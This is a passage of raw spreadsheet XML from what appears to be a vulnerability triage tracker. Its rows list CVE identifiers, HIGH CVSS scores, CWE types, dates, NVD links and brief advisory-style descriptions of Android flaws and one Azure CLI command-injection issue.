t="inlineStr"><is><t>CWE-77</t></is></c><c r="S406" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t></is></c><c r="T406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t></is></c></row><row r="407"><c r="A407" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C407" s="5" t="inlineStr"><is><t>CVE-2026-0065</t></is></c><c r="D407" s="5" t="n"><v>7.8</v></c><c r="E407" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F407" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G407" s="5" t="inlineStr" /><c r="H407" s="5" t="n"><v>0.001</v></c><c r="I407" s="5" t="inlineStr" /><c r="J407" s="5" t="inlineStr" /><c r="K407" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L407" s="5" t="inlineStr" /><c r="M407" s="5" t="inlineStr" /><c r="N407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P407" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q407" s="5" t="inlineStr" /><c r="R407" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S407" s="5" t="inlineStr"><is><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is></c><c r="T407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t></is></c></row><row r="408"><c r="A408" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C408" s="5" t="inlineStr"><is><t>CVE-2026-0084</t></is></c><c r="D408" s="5" t="n"><v>7.8</v></c><c r="E408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F408" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G408" s="5" t="inlineStr" /><c r="H408" s="5" t="n"><v>0.001</v></c><c r="I408" s="5" t="inlineStr" /><c r="J408" s="5" t="inlineStr" /><c r="K408" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L408" s="5" t="inlineStr" /><c r="M408" s="5" t="inlineStr" /><c r="N408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P408" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q408" s="5" t="inlineStr" /><c r="R408" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S408" s="5" t="inlineStr"><is><t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t></is></c></row><row r="409"><c r="A409" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C409" s="5" t="inlineStr"><is><t>CVE-2026-28572</t></is></c><c r="D409" s="5" t="n"><v>7.8</v></c><c r="E409" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F409" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G409" s="5" t="inlineStr" /><c r="H409" s="5" t="n"><v>0.001</v></c><c r="I409" s="5" t="inlineStr" /><c r="J409" s="5" t="inlineStr" /><c r="K409" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L409" s="5" t="inlineStr" /><c r="M409" s="5" t="inlineStr" /><c r="N409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P409" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q409" s="5" t="inlineStr" /><c r="R409" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S409" s="5" t="inlineStr"><is><t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t></is></c></row><row r="410"><c r="A410" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C410" s="5" t="inlineStr"><is><t>CVE-2026-28583</t></is></c><c r="D410" s="5" t="n"><v>7.8</v></c><c r="E410" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F410" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G410" s="5" t="inlineStr" /><c r="H410" s="5" t="n"><v>0.001</v></c><c r="I410" s="5" t="inlineStr" /><c r="J410" s="5" t="inlineStr" /><c r="K410" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L410" s="5" t="inlineStr" /><c r="M410" s="5" t="inlineStr" /><c r="N410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P410" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q410" s="5" t="inlineStr" /><c r="R410" s="5" t="inlineStr"><is><t>CWE-693, CWE-787</t></is></c><c r="S410" s="5" t="inlineStr"><is><t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t></is></c></row><row r="411"><c r="A411" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C411" s="5" t="inlineStr"><is><t>CVE-2026-28590</t></is></c><c r="D411" s="5" t="n"><v>7.8</v></c><c r="E411" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F411" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G411" s="5" t="inlineStr" /><c r="H411" s="5" t="n"><v>0.001</v></c><c r="I411" s="5" t="inlineStr" /><c r="J411" s="5" t="inlineStr" /><c r="K411" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L411" s="5" t="inlineStr" /><c r="M411" s="5" t="inlineStr" /><c r="N411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P411" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q411" s="5" t="inlineStr" /><c r="R411" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S411" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t></is></c></row><row r="412"><c r="A412" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C412" s="5" t="inlineStr"><is><t>CVE-2026-28593</t></is></c><c r="D412" s="5" t="n"><v>7.8</v></c><c r="E412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F412" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G412" s="5" t="inlineStr" /><c r="H412" s="5" t="n"><v>0.001</v></c><c r="I412" s="5" t="inlineStr" /><c r="J412" s="5" t="inlineStr" /><c r="K412" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L412" s="5" t="inlineStr" /><c r="M412" s="5" t="inlineStr" /><c r="N412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P412" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q412" s="5" t="inlineStr" /><c r="R412" s="5" t="inlineStr"><is><t>CWE-356</t></is></c><c r="S412" s="5" t="inlineStr"><is><t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t></is></c></row><row r="413"><c r="A413" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C413" s="5" t="inlineStr"><is><t>CVE-2026-28594</t></is></c><c r="D413" s="5" t="n"><v>7.8</v></c><c r="E413" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F413" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G413" s="5" t="inlineStr" /><c r="H413" s="5" t="n"><v>0.001</v></c><c r="I413" s="5" t="inlineStr" /><c r="J413" s="5" t="inlineStr" /><c r="K413" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L413" s="5" t="inlineStr" /><c r="M413" s="5" t="inlineStr" /><c r="N413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P413" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q413" s="5" t="inlineStr" /><c r="R413" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S413" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t></is></c></row><row r="414"><c r="A414" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C414" s="5" t="inlineStr"><is><t>CVE-2026-28599</t></is></c><c r="D414" s="5" t="n"><v>7.8</v></c><c r="E414" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F414" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G414" s="5" t="inlineStr" /><c r="H414" s="5" t="n"><v>0.001</v></c><c r="I414" s="5" t="inlineStr" /><c r="J414" s="5" t="inlineStr" /><c r="K414" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L414" s="5" t="inlineStr" /><c r="M414" s="5" t="inlineStr" /><c r="N414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P414" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q414" s="5" t="inlineStr" /><c r="R414" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S414" s="5" t="inlineStr"><is><t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t></is></c></row><row r="415"><c r="A415" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C415" s="5" t="inlineStr"><is><t>CVE-2026-28600</t></is></c><c r="D415" s="5" t="n"><v>7.8</v></c><c r="E415" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F415" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G415" s="5" t="inlineStr" /><c r="H415" s="5" t="n"><v>0.001</v></c><c r="I415" s="5" t="inlineStr" /><c r="J415" s="5" t="inlineStr" /><c r="K415" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L415" s="5" t="inlineStr" /><c r="M415" s="5" t="inlineStr" /><c r="N415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P415" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q415" s="5" t="inlineStr" /><c r="R415" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S415" s="5" t="inlineStr"><is><t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t></is></c></row><row r="416"><c r="A416" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C416" s="5" t="inlineStr"><is><t>CVE-2026-28602</t></is></c><c r="D416" s="5" t="n"><v>7.8</v></c><c r="E416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F416" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G416" s="5" t="inlineStr" /><c r="H416" s="5" t="n"><v>0.001</v></c><c r="I416" s="5" t="inlineStr" /><c r="J416" s="5" t="inlineStr" /><c r="K416" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L416" s="5" t="inlineStr" /><c r="M416" s="5" t="inlineStr" /><c r="N416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P416" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q416" s="5" t="inlineStr" /><c r="R416" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S416" s="5" t="inlineStr"><is><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is></c><c r="T416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t></is></c></row><row r="417"><c r="A417" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C417" s="5" t="inlineStr"><is><t>CVE-2026-28603</t></is></c><c r="D417" s="5" t="n"><v>7.8</v></c><c r="E417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F417" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G417" s="5" t="inlineStr" /><c r="H417" s="5" t="n"><v>0.001</v></c><c r="I417" s="5" t="inlineStr" /><c r="J417" s="5" t="inlineStr" /><c r="K417" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L417" s="5" t="inlineStr" /><c r="M417" s="5" t="inlineStr" /><c r="N417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P417" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q417" s="5" t="inlineStr" /><c r="R417" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S417" s="5" t="inlineStr"><is><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is></c><c r="T417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t></is></c></row><row r="418"><c r="A418" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C418" s="5" t="inlineStr"><is><t>CVE-2026-28607</t></is></c><c r="D418" s="5" t="n"><v>7.8</v></c><c r="E418" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F418" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G418" s="5" t="inlineStr" /><c r="H418" s="5" t="n"><v>0.001</v></c><c r="I418" s="5" t="inlineStr" /><c r="J418" s="5" t="inlineStr" /><c r="K418" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L418" s="5" t="inlineStr" /><c r="M418" s="5" t="inlineStr" /><c r="N418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P418" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q418" s="5" t="inlineStr" /><c r="R418" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S418" s="5" t="inlineStr"><is><t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T418" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t></is></c></row><row r="419"><c r="A419" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C419" s="5" t="inlineStr"><is><t>CVE-2026-28611</t></is></c><c r="D419" s="5" t="n"><v>7.8</v></c><c r="E419" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F419" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G419" s="5" t="inlineStr" /><c r="H419" s="5" t="n"><v>0.001</v></c><c r="I419" s="5" t="inlineStr" /><c r="J419" s="5" t="inlineStr" /><c r="K419" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L419" s="5" t="inlineStr" /><c r="M419" s="5" t="inlineStr" /><c r="N419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P419" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q419" s="5" t="inlineStr" /><c r="R419" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S419" s="5" t="inlineStr"><is><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is></c><c r="T419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t></is></c></row><row r="420"><c r="A420" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C420" s="5" t="inlineStr"><is><t>CVE-2026-28612</t></is></c><c r="D420" s="5" t="n"><v>7.8</v></c><c r="E420" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F420" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G420" s="5" t="inlineStr" /><c r="H420" s="5" t="n"><v>0.001</v></c><c r="I420" s="5" t="inlineStr" /><c r="J420" s="5" t="inlineStr" /><c r="K420" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L420" s="5" t="inlineStr" /><c r="M420" s="5" t="inlineStr" /><c r="N420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P420" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q420" s="5" t="inlineStr" /><c r="R420" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S420" s="5" t="inlineStr"><is><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is></c><c r="T420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t></is></c></row><row r="421"><c r="A421" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C421" s="5" t="inlineStr"><is><t>CVE-2026-28614</t></is></c><c r="D421" s="5" t="n"><v>7.8</v></c><c r="E421" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F421" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G421" s="5" t="inlineStr" /><c r="H421" s="5" t="n"><v>0.001</v></c><c r="I421" s="5" t="inlineStr" /><c r="J421" s="5" t="inlineStr" /><c r="K421" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L421" s="5" t="inlineStr" /><c r="M421" s="5" t="inlineStr" /><c r="N421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P421" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q421" s="5" t="inlineStr" /><c r="R421" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S421" s="5" t="inlineStr"><is><t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T421" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t></is></c></row><row r="422"><c r="A422" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C422" s="5" t="inlineStr"><is><t>CVE-2026-28616</t></is></c><c r="D422" s="5" t="n"><v>7.8</v></c><c r="E422" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F422" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G422" s="5" t="inlineStr" /><c r="H422" s="5" t="n"><v>0.001</v></c><c r="I422" s="5" t="inlineStr" /><c r="J422" s="5" t="inlineStr" /><c r="K422" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L422" s="5" t="inlineStr" /><c r="M422" s="5" t="inlineStr" /><c r="N422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P422" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q422" s="5" t="inlineStr" /><c r="R422" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S422" s="5" t="inlineStr"><is><t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T422" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t></is></c></row><row r="423"><c r="A423" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C423" s="5" t="inlineStr"><is><t>CVE-2026-28620</t></is></c><c r="D423" s="5" t="n"><v>7.8</v></c><c r="E423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F423" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G423" s="5" t="inlineStr" /><c r="H423" s="5" t="n"><v>0.001</v></c><c r="I423" s="5" t="inlineStr" /><c r="J423" s="5" t="inlineStr" /><c r="K423" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L423" s="5" t="inlineStr" /><c r="M423" s="5" t="inlineStr" /><c r="N423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P423" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q423" s="5" t="inlineStr" /><c r="R423" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S423" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T423" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t></is></c></row><row r="424"><c r="A424" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C424" s="5" t="inlineStr"><is><t>CVE-2026-28624</t></is></c><c r="D424" s="5" t="n"><v>7.8</v></c><c r="E424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F424" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G424" s="5" t="inlineStr" /><c r="H424" s="5" t="n"><v>0.001</v></c><c r="I424" s="5" t="inlineStr" /><c r="J424" s="5" t="inlineStr" /><c r="K424" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L424" s="5" t="inlineStr" /><c r="M424" s="5" t="inlineStr" /><c r="N424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P424" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q424" s="5" t="inlineStr" /><c r="R424" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S424" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T424" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t></is></c></row><row r="425"><c r="A425" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C425" s="5" t="inlineStr"><is><t>CVE-2026-28631</t></is></c><c r="D425" s="5" t="n"><v>7.8</v></c><c r="E425" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F425" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G425" s="5" t="inlineStr" /><c r="H425" s="5" t="n"><v>0.001</v></c><c r="I425" s="5" t="inlineStr" /><c r="J425" s="5" t="inlineStr" /><c r="K425" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L425" s="5" t="inlineStr" /><c r="M425" s="5" t="inlineStr" /><c r="N425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P425" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q425" s="5" t="inlineStr" /><c r="R425" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S425" s="5" t="inlineStr"><is><t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T425" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t></is></c></row><row r="426"><c r="A426" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C426" s="5" t="inlineStr"><is><t>CVE-2026-28634</t></is></c><c r="D426" s="5" t="n"><v>7.8</v></c><c r="E426" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F426" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G426" s="5" t="inlineStr" /><c r="H426" s="5" t="n"><v>0.001</v></c><c r="I426" s="5" t="inlineStr" /><c r="J426" s="5" t="inlineStr" /><c r="K426" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L426" s="5" t="inlineStr" /><c r="M426" s="5" t="inlineStr" /><c r="N426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P426" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q426" s="5" t="inlineStr" /><c r="R426" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S426" s="5" t="inlineStr"><is><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is></c><c r="T426" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t></is></c></row><row r="427"><c r="A427" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C427" s="5" t="inlineStr"><is><t>CVE-2026-28636</t></is></c><c r="D427" s="5" t="n"><v>7.8</v></c><c r="E427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F427" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G427" s="5" t="inlineStr" /><c r="H427" s="5" t="n"><v>0.001</v></c><c r="I427" s="5" t="inlineStr" /><c r="J427" s="5" t="inlineStr" /><c r="K427" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L427" s="5" t="inlineStr" /><c r="M427" s="5" t="inlineStr" /><c r="N427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P427" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q427" s="5" t="inlineStr" /><c r="R427" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S427" s="5" t="inlineStr"><is><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is></c><c r="T427" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t></is></c></row><row r="428"><c r="A428" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C428" s="5" t="inlineStr"><is><t>CVE-2026-28639</t></is></c><c r="D428" s="5" t="n"><v>7.8</v></c><c r="E428" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F428" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G428" s="5" t="inlineStr" /><c r="H428" s="5" t="n"><v>0.001</v></c><c r="I428" s="5" t="inlineStr" /><c r="J428" s="5" t="inlineStr" /><c r="K428" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L428" s="5" t="inlineStr" /><c r="M428" s="5" t="inlineStr" /><c r="N428" s="5" 